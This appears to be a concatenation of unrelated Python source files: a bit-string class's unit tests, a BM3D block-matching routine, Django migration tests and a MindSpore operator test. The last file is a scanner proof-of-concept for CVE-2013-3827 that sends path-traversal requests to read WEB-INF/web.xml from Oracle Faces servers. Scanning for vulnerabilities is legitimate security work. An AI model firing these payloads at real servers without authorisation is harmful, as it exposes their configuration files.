for pos in range(start, end):
if self[pos:pos + len(sub)] == sub:
return pos
else:
return -1
# -------------------------------------------------------------------------------------------------
import unittest
class BitsTestCase(unittest.TestCase):
def assertBits(self, value, bit_length, bit_value):
self.assertIsInstance(value, bits)
self.assertEqual(value._len_, bit_length)
self.assertEqual(value._int_, bit_value)
def test_from_int(self):
self.assertBits(bits.from_int(0), 0, 0b0)
self.assertBits(bits.from_int(1), 1, 0b1)
self.assertBits(bits.from_int(2), 2, 0b10)
self.assertBits(bits.from_int(2, 5), 5, 0b00010)
self.assertBits(bits.from_int(0b110, 2), 2, 0b10)
self.assertBits(bits.from_int(-1, 16), 16, 0xffff)
def test_from_int_wrong(self):
with self.assertRaisesRegex(ValueError,
r"invalid negative input for bits\(\): '-1'"):
bits.from_int(-1)
def test_from_str(self):
self.assertBits(bits.from_str(""), 0, 0b0)
self.assertBits(bits.from_str("0"), 1, 0b0)
self.assertBits(bits.from_str("010"), 3, 0b010)
self.assertBits(bits.from_str("0 1 011_100"), 8, 0b01011100)
self.assertBits(bits.from_str("+0 1 \t011_100"), 8, 0b01011100)
def test_from_str_wrong(self):
with self.assertRaisesRegex(ValueError,
r"invalid negative input for bits\(\): '-1'"):
bits.from_str("-1")
with self.assertRaisesRegex(ValueError,
r"invalid literal for int\(\) with base 2: '23'"):
bits.from_str("23")
def test_from_bytes(self):
self.assertBits(bits.from_bytes(b"\xa5", 8), 8, 0b10100101)
self.assertBits(bits.from_bytes(b"\xa5\x01", 9), 9, 0b110100101)
self.assertBits(bits.from_bytes(b"\xa5\xff", 9), 9, 0b110100101)
def test_from_iter(self):
self.assertBits(bits.from_iter(iter([])), 0, 0b0)
self.assertBits(bits.from_iter(iter([1,1,0,1,0,0,1])), 7, 0b1001011)
def test_new(self):
self.assertBits(bits(), 0, 0b0)
self.assertBits(bits(10), 4, 0b1010)
self.assertBits(bits(10, 2), 2, 0b10)
self.assertBits(bits("1001"), 4, 0b1001)
self.assertBits(bits(b"\xa5\x01", 9), 9, 0b110100101)
self.assertBits(bits(bytearray(b"\xa5\x01"), 9), 9, 0b110100101)
self.assertBits(bits(memoryview(b"\xa5\x01"), 9), 9, 0b110100101)
self.assertBits(bits([1,1,0,1,0,0,1]), 7, 0b1001011)
self.assertBits(bits(bits("1001"), 2), 2, 0b01)
some = bits("1001")
self.assertIs(bits(some), some)
def test_new_wrong(self):
with self.assertRaisesRegex(TypeError,
r"invalid input for bits\(\): cannot convert from float"):
bits(1.0)
with self.assertRaisesRegex(ValueError,
r"invalid input for bits\(\): when converting from str "
r"length must not be provided"):
bits("1010", 5)
with self.assertRaisesRegex(ValueError,
r"invalid input for bits\(\): when converting from bytes "
r"length must be provided"):
bits(b"\xa5")
with self.assertRaisesRegex(ValueError,
r"invalid input for bits\(\): when converting from an iterable "
r"length must not be provided"):
bits([1,0,1,0], 5)
def test_len(self):
self.assertEqual(len(bits(10)), 4)
def test_bool(self):
self.assertFalse(bits(""))
self.assertTrue(bits("1"))
self.assertTrue(bits("01"))
self.assertTrue(bits("0"))
self.assertTrue(bits("00"))
def test_int(self):
self.assertEqual(int(bits("1010")), 0b1010)
def test_str(self):
self.assertEqual(str(bits("")), "")
self.assertEqual(str(bits("0000")), "0000")
self.assertEqual(str(bits("1010")), "1010")
self.assertEqual(str(bits("01010")), "01010")
def test_bytes(self):
self.assertEqual(bytes(bits("")), b"")
self.assertEqual(bytes(bits("10100101")), b"\xa5")
self.assertEqual(bytes(bits("110100101")), b"\xa5\x01")
def test_repr(self):
self.assertEqual(repr(bits("")), r"bits('')")
self.assertEqual(repr(bits("1010")), r"bits('1010')")
def test_getitem_int(self):
some = bits("10001001011")
self.assertEqual(some[0], 1)
self.assertEqual(some[2], 0)
self.assertEqual(some[5], 0)
self.assertEqual(some[-1], 1)
self.assertEqual(some[-2], 0)
self.assertEqual(some[-5], 1)
def test_getitem_slice(self):
some = bits("10001001011")
self.assertBits(some[:], 11, 0b10001001011)
self.assertBits(some[2:], 9, 0b100010010)
self.assertBits(some[2:9], 7, 0b0010010)
self.assertBits(some[2:-2], 7, 0b0010010)
self.assertBits(some[3:2], 0, 0b0)
def test_getitem_wrong(self):
with self.assertRaisesRegex(TypeError,
r"bits indices must be integers or slices, not str"):
bits()["x"]
def test_iter(self):
some = bits("10001001011")
self.assertEqual(list(some), [1,1,0,1,0,0,1,0,0,0,1])
def test_eq(self):
self.assertEqual(bits("1010"), 0b1010)
self.assertEqual(bits("1010"), "1010")
self.assertEqual(bits("1010"), bits("1010"))
self.assertNotEqual(bits("0010"), 0b0010)
self.assertNotEqual(bits("0010"), "010")
self.assertNotEqual(bits("1010"), bits("01010"))
self.assertNotEqual(bits("1010"), None)
def test_add(self):
self.assertBits(bits("1010") + bits("1110"), 8, 0b11101010)
self.assertBits(bits("1010") + (0,1,1,1), 8, 0b11101010)
self.assertBits((0,1,1,1) + bits("1010"), 8, 0b10101110)
def test_mul(self):
self.assertBits(bits("1011") * 4, 16, 0b1011101110111011)
self.assertBits(4 * bits("1011"), 16, 0b1011101110111011)
def test_and(self):
self.assertBits(bits("1010") & bits("1100"), 4, 0b1000)
self.assertBits(bits("1010") & "1100", 4, 0b1000)
self.assertBits((0,1,0,1) & bits("1100"), 4, 0b1000)
def test_or(self):
self.assertBits(bits("1010") | bits("1100"), 4, 0b1110)
self.assertBits(bits("1010") | "1100", 4, 0b1110)
self.assertBits((0,1,0,1) | bits("1100"), 4, 0b1110)
def test_xor(self):
self.assertBits(bits("1010") ^ bits("1100"), 4, 0b0110)
self.assertBits(bits("1010") ^ "1100", 4, 0b0110)
self.assertBits((0,1,0,1) ^ bits("1100"), 4, 0b0110)
def test_reversed(self):
self.assertBits(bits("1010").reversed(), 4, 0b0101)
def test_find(self):
self.assertEqual(bits("1011").find(bits("11")), 0)
self.assertEqual(bits("1011").find(bits("10")), 2)
self.assertEqual(bits("1011").find(bits("01")), 1)
self.assertEqual(bits("1011").find(bits("00")), -1)
self.assertEqual(bits("101100101").find(bits("10"), 0), 1)
self.assertEqual(bits("101100101").find(bits("10"), 2), 4)
self.assertEqual(bits("101100101").find(bits("10"), 5), 7)
self.assertEqual(bits("101100101").find(bits("10"), 8), -1)
self.assertEqual(bits("1011").find(bits((1,0))), 1)
|
precompute_BM_2ed.py | fevorl/BM3D_py | 157 | 12685795 | import numpy as np
def precompute_BM(img, kHW, NHW, nHW, tauMatch):
"""
    Search for patches similar to each reference patch (block matching).
:param img: input image
:param kHW: length of side of patch
:param NHW: how many patches are stacked
:param nHW: length of side of search area
    :param tauMatch: threshold that determines whether two patches are similar
    :return ri_rj_N__ni_nj: for each reference patch, the (row, col) coordinates of its top N most similar patches
    :return threshold_count: for each reference patch, how many patches are similar according to tauMatch (clamped to a power of two no larger than NHW)
"""
img = img.astype(np.float64)
height, width = img.shape
Ns = 2 * nHW + 1
threshold = tauMatch * kHW * kHW
sum_table = np.ones((Ns, Ns, height, width)) * 2 * threshold # di, dj, ph, pw
row_add_mat, column_add_mat = get_add_patch_matrix(height, width, nHW, kHW)
diff_margin = np.pad(np.ones((height - 2 * nHW, width - 2 * nHW)), nHW, 'constant', constant_values=0.)
sum_margin = (1 - diff_margin) * 2 * threshold
for di in range(-nHW, nHW + 1):
for dj in range(-nHW, nHW + 1):
t_img = translation_2d_mat(img, right=-dj, down=-di)
diff_table_2 = (img - t_img) * (img - t_img) * diff_margin
sum_diff_2 = row_add_mat @ diff_table_2 @ column_add_mat
sum_table[di + nHW, dj + nHW] = np.maximum(sum_diff_2, sum_margin) # sum_table (2n+1, 2n+1, height, width)
sum_table = sum_table.reshape((Ns * Ns, height * width)) # di_dj, ph_pw
sum_table_T = sum_table.transpose((1, 0)) # ph_pw__di_dj
argsort = np.argpartition(sum_table_T, range(NHW))[:, :NHW]
argsort[:, 0] = (Ns * Ns - 1) // 2
argsort_di = argsort // Ns - nHW
argsort_dj = argsort % Ns - nHW
near_pi = argsort_di.reshape((height, width, -1)) + np.arange(height)[:, np.newaxis, np.newaxis]
near_pj = argsort_dj.reshape((height, width, -1)) + np.arange(width)[np.newaxis, :, np.newaxis]
ri_rj_N__ni_nj = np.concatenate((near_pi[:, :, :, np.newaxis], near_pj[:, :, :, np.newaxis]), axis=-1)
sum_filter = np.where(sum_table_T < threshold, 1, 0)
threshold_count = np.sum(sum_filter, axis=1)
threshold_count = closest_power_of_2(threshold_count, max_=NHW)
threshold_count = threshold_count.reshape((height, width))
return ri_rj_N__ni_nj, threshold_count
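# Usage sketch (illustrative values, not part of the original file; shapes follow from the code above):
#   img = np.random.rand(64, 64)
#   near, counts = precompute_BM(img, kHW=8, NHW=16, nHW=16, tauMatch=2500)
#   near.shape   -> (64, 64, 16, 2)   # per pixel: (row, col) of its 16 closest patches
#   counts.shape -> (64, 64)          # per pixel: similar-patch count, a power of two capped at NHW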
def get_add_patch_matrix(h, w, nHW, kHW):
row_add = np.eye(h - 2 * nHW)
row_add = np.pad(row_add, nHW, 'constant')
row_add_mat = row_add.copy()
for k in range(1, kHW):
row_add_mat += translation_2d_mat(row_add, right=k, down=0)
column_add = np.eye(w - 2 * nHW)
column_add = np.pad(column_add, nHW, 'constant')
column_add_mat = column_add.copy()
for k in range(1, kHW):
column_add_mat += translation_2d_mat(column_add, right=0, down=k)
return row_add_mat, column_add_mat
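# Sketch of what the two matrices do (illustrative numbers, not from the original file): for an
# image D, (row_add_mat @ D @ column_add_mat)[i, j] is the sum of D over the kHW x kHW window
# whose top-left corner is (i, j), for positions inside the nHW margin. For example, with
# h = w = 6, nHW = 1, kHW = 2, entry (1, 1) equals D[1,1] + D[1,2] + D[2,1] + D[2,2].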
def translation_2d_mat(mat, right, down):
mat = np.roll(mat, right, axis=1)
mat = np.roll(mat, down, axis=0)
return mat
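# e.g. translation_2d_mat(np.arange(9).reshape(3, 3), right=1, down=0) shifts each row one column
# to the right, with the last column wrapping around to the front (np.roll semantics).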
def closest_power_of_2(M, max_):
M = np.where(max_ < M, max_, M)
while max_ > 1:
M = np.where((max_ // 2 < M) * (M < max_), max_ // 2, M)
max_ //= 2
return M
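# e.g. closest_power_of_2(np.array([1, 2, 3, 5, 9]), max_=8) -> array([1, 2, 2, 4, 8]):
# each count is clamped to max_ and then rounded down to the nearest power of two.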
if __name__ == '__main__':
import os
import cv2
from utils import add_gaussian_noise, symetrize
# <hyper parameter>
# ref_i, ref_j = 196, 142
ref_i, ref_j = 164, 135
# ref_i, ref_j = 271, 206
kHW = 8
NHW = 3
nHW = 16
tauMatch = 2500
# <hyper parameter \>
im = cv2.imread('test_data/image/Cameraman.png', cv2.IMREAD_GRAYSCALE)
im = im[100:, :]
ref_i, ref_j = 64, 135
im_noisy = add_gaussian_noise(im, 10, seed=1)
img_noisy_p = symetrize(im_noisy, nHW)
near_pij, threshold_count = precompute_BM(img_noisy_p, kHW=kHW, NHW=NHW, nHW=nHW, tauMatch=tauMatch)
im = cv2.cvtColor(img_noisy_p, cv2.COLOR_GRAY2RGB)
# <draw search area>
points_list = [(ref_j - nHW, ref_i - nHW), (ref_j + nHW, ref_i - nHW), (ref_j - nHW, ref_i + nHW),
(ref_j + nHW, ref_i + nHW)]
for point in points_list:
cv2.circle(im, point, 0, (0, 0, 255), 1)
# <draw search area \>
# <draw reference patch>
cv2.rectangle(im, (ref_j, ref_i), (ref_j + kHW, ref_i + kHW), color=(255, 0, 0), thickness=1)
# <draw reference patch \>
# <draw similar patches>
count = threshold_count[ref_i, ref_j]
for i, Pnear in enumerate(near_pij[ref_i, ref_j]):
if i == 0:
continue
if i > count:
break
y, x = Pnear
cv2.rectangle(im, (x, y), (x + kHW, y + kHW), color=(0, 255, 0), thickness=1)
# <draw similar patches \>
# cv2.imshow('im', im)
# cv2.waitKey()
cv2.imwrite('BM_real_im_test.png', im)
|
koku/koku/test_migration_sql_helpers.py | rubik-ai/koku | 157 | 12685812 | import os
from django.db import connection as conn
from . import migration_sql_helpers as msh
from api.iam.test.iam_test_case import IamTestCase
class TestMigrationSQLHelpers(IamTestCase):
def test_find_func_dir(self):
"""
Test success finding function dir
"""
self.assertNotEqual(msh.find_db_functions_dir(), "")
def test_no_find_func_dir(self):
"""
Test failure finding function dir
"""
with self.assertRaises(FileNotFoundError):
msh.find_db_functions_dir("___________no_dir_here_____________")
def test_apply_sql_file(self):
"""
Test apply sql file
"""
filename = "./___test_apply_sql_file.sql"
try:
with open(filename, "wt") as f:
print("select 1;", file=f)
self.assertEqual(msh.apply_sql_file(conn.schema_editor(), filename), True)
finally:
os.unlink(filename)
def test_no_apply_sql_file(self):
"""
Test failure applying sql file
"""
filename = "./___test_apply_sql_file.sql"
try:
with open(filename, "wt") as f:
print("select 1;", file=f)
with self.assertRaises(TypeError):
msh.apply_sql_file(None, filename)
finally:
os.unlink(filename)
|
tests/st/fusion/test_unsorted_segment_sum_fission.py | PowerOlive/mindspore | 3,200 | 12685820 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import mindspore
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.unsorted_segment_sum = P.UnsortedSegmentSum()
self.num_segments = 3
def construct(self, x, segment_ids):
x = self.unsorted_segment_sum(x, segment_ids, self.num_segments)
return x
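# Worked example of the operator's semantics (assumed for illustration, not asserted by this test):
# with segment_ids = [0, 1, 2] and num_segments = 3, input row i is summed into segment i, so the
# output keeps shape (3, 39, 1) and equals the input; ids such as [0, 0, 2] would instead add rows
# 0 and 1 into segment 0 and leave segment 1 all zeros.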
def test_net():
input_x = np.random.randn(3, 39, 1).astype(np.float32)
segment_ids = Tensor([0, 1, 2], mindspore.int32)
net = Net()
output = net(Tensor(input_x), segment_ids)
print("result", output.asnumpy())
if __name__ == "__main__":
test_net()
|
2013/CVE-2013-3827/poc/pocsploit/CVE-2013-3827.py | hjyuan/reapoc | 421 | 12685833 | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Javafaces LFI''',
"description": '''An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 192.168.127.12.0, 192.168.127.12.0, and 192.168.127.12.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.''',
"severity": "medium",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2013-3827",
"https://www.exploit-db.com/exploits/38802",
"https://www.oracle.com/security-alerts/cpuoct2013.html"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "CVE-2013-3827",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2013", "lfi", "javafaces", "oracle"],
}
# Vendor Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
paths = [
"/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/secureader/javax.faces.resource/web.xml?loc=../WEB-INF",
"/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF",
"/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
]
for path in paths:
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "<web-app" in resp.text and "</web-app>" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
return result
        # No path matched: record the failure explicitly so callers can always read result["success"].
        result["success"] = False
    except Exception:
        result["success"] = False
    return result
# Exploit; may be the same as poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
    return url
|